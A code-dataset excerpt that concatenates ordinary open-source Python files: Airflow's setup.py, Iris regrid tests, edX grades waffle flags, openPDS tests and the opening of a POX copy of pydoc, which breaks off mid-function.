logger = logging.getLogger(__name__)
# Kept manually in sync with airflow.__version__
version = imp.load_source(
'airflow.version', os.path.join('airflow', 'version.py')).version
class Tox(TestCommand):
user_options = [('tox-args=', None, "Arguments to pass to tox")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.tox_args = ''
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
#import here, cause outside the eggs aren't loaded
import tox
errno = tox.cmdline(args=self.tox_args.split())
sys.exit(errno)
class CleanCommand(Command):
"""Custom clean command to tidy up the project root."""
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
os.system('rm -vrf ./build ./dist ./*.pyc ./*.tgz ./*.egg-info')
def git_version(version):
"""
Return a version to identify the state of the underlying git repo. The version will
indicate whether the head of the current git-backed working directory is tied to a
release tag or not : it will indicate the former with a 'release:{version}' prefix
and the latter with a 'dev0' prefix. Following the prefix will be a sha of the current
branch head. Finally, a "dirty" suffix is appended to indicate that uncommitted changes
are present.
"""
repo = None
try:
import git
repo = git.Repo('.git')
except ImportError:
logger.warn('gitpython not found: Cannot compute the git version.')
return ''
except Exception as e:
logger.warn('Git repo not found: Cannot compute the git version.')
return ''
if repo:
sha = repo.head.commit.hexsha
if repo.is_dirty():
return '.dev0+{sha}.dirty'.format(sha=sha)
# commit is clean
# is it release of `version` ?
try:
tag = repo.git.describe(
match='[0-9]*', exact_match=True,
tags=True, dirty=True)
assert tag == version, (tag, version)
return '.release:{version}+{sha}'.format(version=version,
sha=sha)
except git.GitCommandError:
return '.dev0+{sha}'.format(sha=sha)
else:
return 'no_git_version'
def write_version(filename=os.path.join(*['airflow',
'git_version'])):
text = "{}".format(git_version(version))
with open(filename, 'w') as a:
a.write(text)
async = [
'greenlet>=0.4.9',
'eventlet>= 0.9.7',
'gevent>=0.13'
]
celery = [
'celery>=3.1.17',
'flower>=0.7.3'
]
cgroups = [
'cgroupspy>=0.1.4',
]
crypto = ['cryptography>=0.9.3']
datadog = ['datadog>=0.14.0']
doc = [
'sphinx>=1.2.3',
'sphinx-argparse>=0.1.13',
'sphinx-rtd-theme>=0.1.6',
'Sphinx-PyPI-upload>=0.2.1'
]
docker = ['docker-py>=1.6.0']
druid = ['pydruid>=0.2.1']
emr = ['boto3>=1.0.0']
gcp_api = [
'httplib2',
'google-api-python-client>=1.5.0, <1.6.0',
'oauth2client>=2.0.2, <2.1.0',
'PyOpenSSL',
]
hdfs = ['snakebite>=2.7.8']
webhdfs = ['hdfs[dataframe,avro,kerberos]>=2.0.4']
jira = ['JIRA>1.0.7']
hive = [
'hive-thrift-py>=0.0.1',
'pyhive>=0.1.3',
'impyla>=0.13.3',
'unicodecsv>=0.14.1'
]
jdbc = ['jaydebeapi>=0.2.0']
mssql = ['pymssql>=2.1.1', 'unicodecsv>=0.14.1']
mysql = ['mysqlclient>=1.3.6']
rabbitmq = ['librabbitmq>=1.6.1']
oracle = ['cx_Oracle>=5.1.2']
postgres = ['psycopg2>=2.6']
salesforce = ['simple-salesforce>=0.72']
s3 = [
'boto>=2.36.0',
'filechunkio>=1.6',
]
samba = ['pysmbclient>=0.1.3']
slack = ['slackclient>=1.0.0']
statsd = ['statsd>=3.0.1, <4.0']
vertica = ['vertica-python>=0.5.1']
ldap = ['ldap3>=0.9.9.1']
kerberos = ['pykerberos>=1.1.13',
'requests_kerberos>=0.10.0',
'thrift_sasl>=0.2.0',
'snakebite[kerberos]>=2.7.8',
'kerberos>=1.2.5']
password = [
'bcrypt>=2.0.0',
'flask-bcrypt>=0.7.1',
]
github_enterprise = ['Flask-OAuthlib>=0.9.1']
qds = ['qds-sdk>=1.9.0']
cloudant = ['cloudant>=0.5.9,<2.0'] # major update coming soon, clamp to 0.x
all_dbs = postgres + mysql + hive + mssql + hdfs + vertica + cloudant
devel = [
'click',
'freezegun',
'jira',
'lxml>=3.3.4',
'mock',
'moto',
'nose',
'nose-ignore-docstring==0.2',
'nose-parameterized',
]
devel_minreq = devel + mysql + doc + password + s3 + cgroups
devel_hadoop = devel_minreq + hive + hdfs + webhdfs + kerberos
devel_all = devel + all_dbs + doc + samba + s3 + slack + crypto + oracle + docker
def do_setup():
write_version()
setup(
name='airflow',
description='Programmatically author, schedule and monitor data pipelines',
license='Apache License 2.0',
version=version,
packages=find_packages(),
package_data={'': ['airflow/alembic.ini', "airflow/git_version"]},
include_package_data=True,
zip_safe=False,
scripts=['airflow/bin/airflow'],
install_requires=[
'alembic>=0.8.3, <0.9',
'croniter>=0.3.8, <0.4',
'dill>=0.2.2, <0.3',
'flask>=0.11, <0.12',
'flask-admin==1.4.1',
'flask-cache>=0.13.1, <0.14',
'flask-login==0.2.11',
'flask-swagger==0.2.13',
'flask-wtf==0.12',
'funcsigs==1.0.0',
'future>=0.15.0, <0.16',
'gitpython>=2.0.2',
'gunicorn>=19.3.0, <19.4.0', # 19.4.? seemed to have issues
'jinja2>=2.7.3, <2.9.0',
'lxml>=3.6.0, <4.0',
'markdown>=2.5.2, <3.0',
'pandas>=0.17.1, <1.0.0',
'psutil>=4.2.0, <5.0.0',
'pygments>=2.0.1, <3.0',
'python-daemon>=2.1.1, <2.2',
'python-dateutil>=2.3, <3',
'python-nvd3==0.14.2',
'requests>=2.5.1, <3',
'setproctitle>=1.1.8, <2',
'sqlalchemy>=0.9.8',
'tabulate>=0.7.5, <0.8.0',
'thrift>=0.9.2, <0.10',
'zope.deprecation>=4.0, <5.0',
],
extras_require={
'all': devel_all,
'all_dbs': all_dbs,
'async': async,
'celery': celery,
'cgroups': cgroups,
'cloudant': cloudant,
'crypto': crypto,
'datadog': datadog,
'devel': devel_minreq,
'devel_hadoop': devel_hadoop,
'doc': doc,
'docker': docker,
'druid': druid,
'emr': emr,
'gcp_api': gcp_api,
'github_enterprise': github_enterprise,
'hdfs': hdfs,
'hive': hive,
'jdbc': jdbc,
'kerberos': kerberos,
'ldap': ldap,
'mssql': mssql,
'mysql': mysql,
'oracle': oracle,
'password': password,
'postgres': postgres,
'qds': qds,
'rabbitmq': rabbitmq,
's3': s3,
'salesforce': salesforce,
'samba': samba,
'slack': slack,
'statsd': statsd,
'vertica': vertica,
'webhdfs': webhdfs,
'jira': jira,
},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Topic :: System :: Monitoring',
],
author='Maxime Beauchemin',
author_email='[email protected]',
url='https://github.com/apache/incubator-airflow',
download_url=(
'https://github.com/apache/incubator-airflow/tarball/' + version),
cmdclass={
'test': Tox,
'extra_clean': CleanCommand,
},
)
if __name__ == "__main__":
do_setup()
| apache-2.0 |
ajdawson/iris | lib/iris/tests/integration/test_regrid_equivalence.py | 6 | 10809 | # (C) British Crown Copyright 2016, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""
Tests to check the validity of replacing
"iris.analysis._interpolate.regrid`('nearest')" with
"iris.cube.Cube.regrid(scheme=iris.analysis.Nearest())".
"""
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
# Import iris.tests first so that some things can be initialised before
# importing anything else.
import iris.tests as tests
import numpy as np
import iris
from iris.analysis._interpolate_private import regrid
from iris.analysis import Nearest
from iris.cube import Cube
from iris.coords import AuxCoord, DimCoord
def grid_cube(xx, yy, data=None):
nx, ny = len(xx), len(yy)
if data is not None:
data = np.array(data).reshape((ny, nx))
else:
data = np.zeros((ny, nx))
cube = Cube(data)
y_coord = DimCoord(yy, standard_name='latitude', units='degrees')
x_coord = DimCoord(xx, standard_name='longitude', units='degrees')
cube.add_dim_coord(y_coord, 0)
cube.add_dim_coord(x_coord, 1)
return cube
ENABLE_DEBUG_OUTPUT = False
def _debug_data(cube, test_id):
if ENABLE_DEBUG_OUTPUT:
print
data = cube.data
print('CUBE: {}'.format(test_id))
print(' x={!r}'.format(cube.coord('longitude').points))
print(' y={!r}'.format(cube.coord('latitude').points))
print('data[{}]:'.format(type(data)))
print(repr(data))
class MixinCheckingCode(object):
def test_basic(self):
src_x = [30., 40., 50.]
dst_x = [32., 42.]
src_y = [-10., 0., 10.]
dst_y = [-8., 2.]
data = [[3., 4., 5.],
[23., 24., 25.],
[43., 44., 45.]]
expected_result = [[3., 4.],
[23., 24.]]
src_cube = grid_cube(src_x, src_y, data)
_debug_data(src_cube, "basic SOURCE")
dst_cube = grid_cube(dst_x, dst_y)
result_cube = self.regrid(src_cube, dst_cube)
_debug_data(result_cube, "basic RESULT")
self.assertArrayAllClose(result_cube.data, expected_result)
def test_src_extrapolation(self):
src_x = [30., 40., 50.]
dst_x = [0., 29.0, 39.0]
src_y = [-10., 0., 10.]
dst_y = [-50., -9., -1.]
data = [[3., 4., 5.],
[23., 24., 25.],
[43., 44., 45.]]
expected_result = [[3., 3., 4.],
[3., 3., 4.],
[23., 23., 24.]]
src_cube = grid_cube(src_x, src_y, data)
_debug_data(src_cube, "extrapolate SOURCE")
dst_cube = grid_cube(dst_x, dst_y)
result_cube = self.regrid(src_cube, dst_cube)
_debug_data(result_cube, "extrapolate RESULT")
self.assertArrayAllClose(result_cube.data, expected_result)
def test_exact_matching_points(self):
src_x = [10.0, 20.0, 30.0]
src_y = [10.0, 20.0, 30.0]
dst_x = [14.9, 15.1, 20.0, 24.9, 25.1]
dst_y = [14.9, 15.1, 20.0, 24.9, 25.1]
data = [[3., 4., 5.],
[23., 24., 25.],
[43., 44., 45.]]
expected_result = [[3., 4., 4., 4., 5.],
[23., 24., 24., 24., 25.],
[23., 24., 24., 24., 25.],
[23., 24., 24., 24., 25.],
[43., 44., 44., 44., 45.]]
src_cube = grid_cube(src_x, src_y, data)
_debug_data(src_cube, "matching SOURCE")
dst_cube = grid_cube(dst_x, dst_y)
result_cube = self.regrid(src_cube, dst_cube)
_debug_data(result_cube, "matching RESULt")
self.assertArrayAllClose(result_cube.data, expected_result)
def test_source_mask(self):
src_x = [40.0, 50.0, 60.0]
src_y = [40.0, 50.0, 60.0]
dst_x = [44.99, 45.01, 48.0, 50.0, 52.0, 54.99, 55.01]
dst_y = [44.99, 45.01, 48.0, 50.0, 52.0, 54.99, 55.01]
data = np.ma.masked_equal([[3., 4., 5.],
[23., 999, 25.],
[43., 44., 45.]],
999)
expected_result = np.ma.masked_equal(
[[3., 4., 4., 4., 4., 4., 5.],
[23., 999, 999, 999, 999, 999, 25.],
[23., 999, 999, 999, 999, 999, 25.],
[23., 999, 999, 999, 999, 999, 25.],
[23., 999, 999, 999, 999, 999, 25.],
[23., 999, 999, 999, 999, 999, 25.],
[43., 44., 44., 44., 44., 44., 45.]],
999)
src_cube = grid_cube(src_x, src_y, data)
src_cube.data = np.ma.masked_array(src_cube.data)
src_cube.data[1, 1] = np.ma.masked
_debug_data(src_cube, "masked SOURCE")
dst_cube = grid_cube(dst_x, dst_y)
result_cube = self.regrid(src_cube, dst_cube,
translate_nans_to_mask=True)
_debug_data(result_cube, "masked RESULT")
self.assertMaskedArrayEqual(result_cube.data, expected_result)
def test_wrapping_non_circular(self):
src_x = [-10., 0., 10.]
dst_x = [-360.0, -170., -1.0, 1.0, 50.0, 170.0, 352.0, 720.0]
src_y = [0., 10.]
dst_y = [0., 10.]
data = [[3., 4., 5.],
[3., 4., 5.]]
src_cube = grid_cube(src_x, src_y, data)
dst_cube = grid_cube(dst_x, dst_y)
# Account for a behavioural difference in this case :
# The Nearest scheme does wrapping of modular coordinate values.
# Thus target of 352.0 --> -8.0, which is nearest to -10.
# This looks just like "circular" handling, but only because it happens
# to produce the same results *for nearest-neighbour in particular*.
if isinstance(self, TestInterpolateRegridNearest):
# interpolate.regrid --> Wrapping-free results (non-circular).
expected_result = [[3., 3., 4., 4., 5., 5., 5., 5.],
[3., 3., 4., 4., 5., 5., 5., 5.]]
else:
# cube regrid --> Wrapped results.
expected_result = [[4., 3., 4., 4., 5., 5., 3., 4.],
[4., 3., 4., 4., 5., 5., 3., 4.]]
_debug_data(src_cube, "noncircular SOURCE")
result_cube = self.regrid(src_cube, dst_cube)
_debug_data(result_cube, "noncircular RESULT")
self.assertArrayAllClose(result_cube.data, expected_result)
def test_wrapping_circular(self):
# When x-coord is "circular", the above distinction does not apply :
# results are the same for both calculations.
src_x = [-10., 0., 10.]
dst_x = [-360.0, -170., -1.0, 1.0, 50.0, 170.0, 352.0, 720.0]
src_y = [0., 10.]
dst_y = [0., 10.]
data = [[3., 4., 5.],
[3., 4., 5.]]
src_cube = grid_cube(src_x, src_y, data)
dst_cube = grid_cube(dst_x, dst_y)
src_cube.coord('longitude').circular = True
expected_result = [[4., 3., 4., 4., 5., 5., 3., 4.],
[4., 3., 4., 4., 5., 5., 3., 4.]]
_debug_data(src_cube, "circular SOURCE")
result_cube = self.regrid(src_cube, dst_cube)
_debug_data(result_cube, "circular RESULT")
self.assertArrayAllClose(result_cube.data, expected_result)
def test_wrapping_non_angular(self):
src_x = [-10., 0., 10.]
dst_x = [-360.0, -170., -1.0, 1.0, 50.0, 170.0, 352.0, 720.0]
src_y = [0., 10.]
dst_y = [0., 10.]
data = [[3., 4., 5.],
[3., 4., 5.]]
src_cube = grid_cube(src_x, src_y, data)
dst_cube = grid_cube(dst_x, dst_y)
for co_name in ('longitude', 'latitude'):
for cube in (src_cube, dst_cube):
coord = cube.coord(co_name)
coord.coord_system = None
coord.convert_units('1')
# interpolate.regrid --> Wrapping-free results (non-circular).
expected_result = [[3., 3., 4., 4., 5., 5., 5., 5.],
[3., 3., 4., 4., 5., 5., 5., 5.]]
_debug_data(src_cube, "non-angle-lons SOURCE")
result_cube = self.regrid(src_cube, dst_cube)
_debug_data(result_cube, "non-angle-lons RESULT")
self.assertArrayAllClose(result_cube.data, expected_result)
def test_source_nan(self):
src_x = [40.0, 50.0, 60.0]
src_y = [40.0, 50.0, 60.0]
dst_x = [44.99, 45.01, 48.0, 50.0, 52.0, 54.99, 55.01]
dst_y = [44.99, 45.01, 48.0, 50.0, 52.0, 54.99, 55.01]
nan = np.nan
data = [[3., 4., 5.],
[23., nan, 25.],
[43., 44., 45.]]
expected_result = [[3., 4., 4., 4., 4., 4., 5.],
[23., nan, nan, nan, nan, nan, 25.],
[23., nan, nan, nan, nan, nan, 25.],
[23., nan, nan, nan, nan, nan, 25.],
[23., nan, nan, nan, nan, nan, 25.],
[23., nan, nan, nan, nan, nan, 25.],
[43., 44., 44., 44., 44., 44., 45.]]
src_cube = grid_cube(src_x, src_y, data)
_debug_data(src_cube, "nan SOURCE")
dst_cube = grid_cube(dst_x, dst_y)
result_cube = self.regrid(src_cube, dst_cube)
_debug_data(result_cube, "nan RESULT")
self.assertArrayEqual(result_cube.data, expected_result)
# perform identical tests on the old + new approaches
class TestInterpolateRegridNearest(MixinCheckingCode, tests.IrisTest):
def regrid(self, src_cube, dst_cube,
translate_nans_to_mask=False, **kwargs):
result = regrid(src_cube, dst_cube, mode='nearest')
data = result.data
if translate_nans_to_mask and np.any(np.isnan(data)):
data = np.ma.masked_array(data, mask=np.isnan(data))
result.data = data
return result
class TestCubeRegridNearest(MixinCheckingCode, tests.IrisTest):
scheme = Nearest(extrapolation_mode='extrapolate')
def regrid(self, src_cube, dst_cube, **kwargs):
return src_cube.regrid(dst_cube, scheme=self.scheme)
if __name__ == '__main__':
tests.main()
| gpl-3.0 |
cpennington/edx-platform | lms/djangoapps/grades/config/waffle.py | 4 | 2419 | """
This module contains various configuration settings via
waffle switches for the Grades app.
"""
from openedx.core.djangoapps.waffle_utils import CourseWaffleFlag, WaffleFlagNamespace, WaffleSwitchNamespace
# Namespace
WAFFLE_NAMESPACE = u'grades'
# Switches
ASSUME_ZERO_GRADE_IF_ABSENT = u'assume_zero_grade_if_absent'
DISABLE_REGRADE_ON_POLICY_CHANGE = u'disable_regrade_on_policy_change'
# Course Flags
REJECTED_EXAM_OVERRIDES_GRADE = u'rejected_exam_overrides_grade'
ENFORCE_FREEZE_GRADE_AFTER_COURSE_END = u'enforce_freeze_grade_after_course_end'
WRITABLE_GRADEBOOK = u'writable_gradebook'
BULK_MANAGEMENT = u'bulk_management'
def waffle():
"""
Returns the namespaced, cached, audited Waffle class for Grades.
"""
return WaffleSwitchNamespace(name=WAFFLE_NAMESPACE, log_prefix=u'Grades: ')
def waffle_flags():
"""
Returns the namespaced, cached, audited Waffle flags dictionary for Grades.
"""
namespace = WaffleFlagNamespace(name=WAFFLE_NAMESPACE, log_prefix=u'Grades: ')
return {
# By default, enable rejected exam grade overrides. Can be disabled on a course-by-course basis.
REJECTED_EXAM_OVERRIDES_GRADE: CourseWaffleFlag(
namespace,
REJECTED_EXAM_OVERRIDES_GRADE,
flag_undefined_default=True,
),
ENFORCE_FREEZE_GRADE_AFTER_COURSE_END: CourseWaffleFlag(
namespace,
ENFORCE_FREEZE_GRADE_AFTER_COURSE_END,
flag_undefined_default=True,
),
# Have this course override flag so we can selectively turn off the gradebook for courses.
WRITABLE_GRADEBOOK: CourseWaffleFlag(
namespace,
WRITABLE_GRADEBOOK,
flag_undefined_default=True,
),
BULK_MANAGEMENT: CourseWaffleFlag(
namespace,
BULK_MANAGEMENT,
flag_undefined_default=False,
),
}
def is_writable_gradebook_enabled(course_key):
"""
Returns whether the writable gradebook app is enabled for the given course.
"""
return waffle_flags()[WRITABLE_GRADEBOOK].is_enabled(course_key)
def gradebook_can_see_bulk_management(course_key):
"""
Returns whether bulk management features should be visible for the given course.
(provided that course contains a masters track, as of this writing)
"""
return waffle_flags()[BULK_MANAGEMENT].is_enabled(course_key)
| agpl-3.0 |
patcon/openPDS | openpds/accesscontrol/tests.py | 3 | 2697 | """
This file demonstrates writing tests using the unittest module. These will pass
when you run "manage.py test".
Replace this with more appropriate tests for your application.
"""
from django.test import TestCase
#from openpds.accesscontrol.models import FunfProbeGroupSetting, FunfProbeSetting
from openpds.core.internal import getAccessControlledInternalDataStore
import sqlite3
from openpds.core.models import Profile
from openpds import getInternalDataStore
from openpds.accesscontrol.models import Settings
from openpds.probedatavisualization_tasks import recentProbeDataScores
class SimpleTest(TestCase):
def test_basic_addition(self):
"""
Tests that 1 + 1 always equals 2.
"""
self.assertEqual(1 + 1, 2)
#class FunfProbeSettingsTestCase(TestCase):
# def setUp(self):
# #Funf probe groups
# motionGroup = FunfProbeGroupSetting.objects.create(funfProbeGroupName="motion", isProbeGroupSelected=True)
# socialGroup = FunfProbeGroupSetting.objects.create(funfProbeGroupName="social", isProbeGroupSelected=False)
#
# #Funf probes
# FunfProbeSetting.objects.create(funfProbe="edu.mit.media.funf.probe.builtin.ActivityProbe", isProbeSelected=True, funfProbeGroup=motionGroup)
# FunfProbeSetting.objects.create(funfProbe="edu.mit.media.funf.probe.builtin.SmsProbe", isProbeSelected=False, funfProbeGroup=socialGroup)
#
# def testFunfSettings(self):
# """Tests the assignment of probes."""
# activityProbe = FunfProbeSetting.objects.get(funfProbe="edu.mit.media.funf.probe.builtin.ActivityProbe")
# smsProbe = FunfProbeSetting.objects.get(funfProbe="edu.mit.media.funf.probe.builtin.SmsProbe")
# self.assertEqual(activityProbe.getIsProbeSelected(), False) #Should return an assertion error
# self.assertEqual(smsProbe.getIsProbeSelected(), False)
class InternalDataStoreTest(TestCase):
def setUp(self):
#user
owner = Profile.objects.create(uuid='12345')
access_control_setting = Settings.objects.create(datastore_owner_id = owner.id, app_id = 'app', lab_id = 'lab', service_id = 'service', enabled = 0, activity_probe = 1, sms_probe = 1, call_log_probe = 1, bluetooth_probe = 1, wifi_probe = 1, simple_location_probe = 1, screen_probe = 1, running_applications_probe = 1, hardware_info_probe = 1, app_usage_probe = 1)
def test_creation(self):
try:
owner = Profile.objects.get(uuid='12345')
internalDataStore = getAccessControlledInternalDataStore(owner, "app", "lab", "service")
internalDataStore.getData('bluetooth_probe', 0, 1000)
except Profile.DoesNotExist:
print "Does not exist"
class ProbeDataVisualizationTest(TestCase):
def test_visualization(self):
recentProbeDataScores()
| mit |
adusia/pox | tools/pox-pydoc.py | 78 | 93651 | #! /usr/bin/python2.7
# -*- coding: latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <[email protected]>"
__date__ = "26 February 2001"
__version__ = "$Revision: 84174 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
import sys
sys.path.append('..')
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
from collections import deque
except ImportError:
# Python 2.3 compatibility
class deque(list):
def popleft(self):
return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__',
'__dict__', '__weakref__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
elif name.startswith('_handle_'):
return 1
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
def fixup(data):
name, kind, cls, value = data
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
return name, kind, cls, value
return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (0, None))
if lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
exc, value, tb = exc_info
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Avoid simply calling reload() because it leaves names in
# the currently loaded module lying around if they're not
# defined in the new source file. Instead, remove the
# module from sys.modules and re-import. Also remove any
# submodules because they won't appear in the newly loaded
# module's namespace if they're already in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"http://docs.python.org/library")
basedir = os.path.join(sys.exec_prefix, "lib",
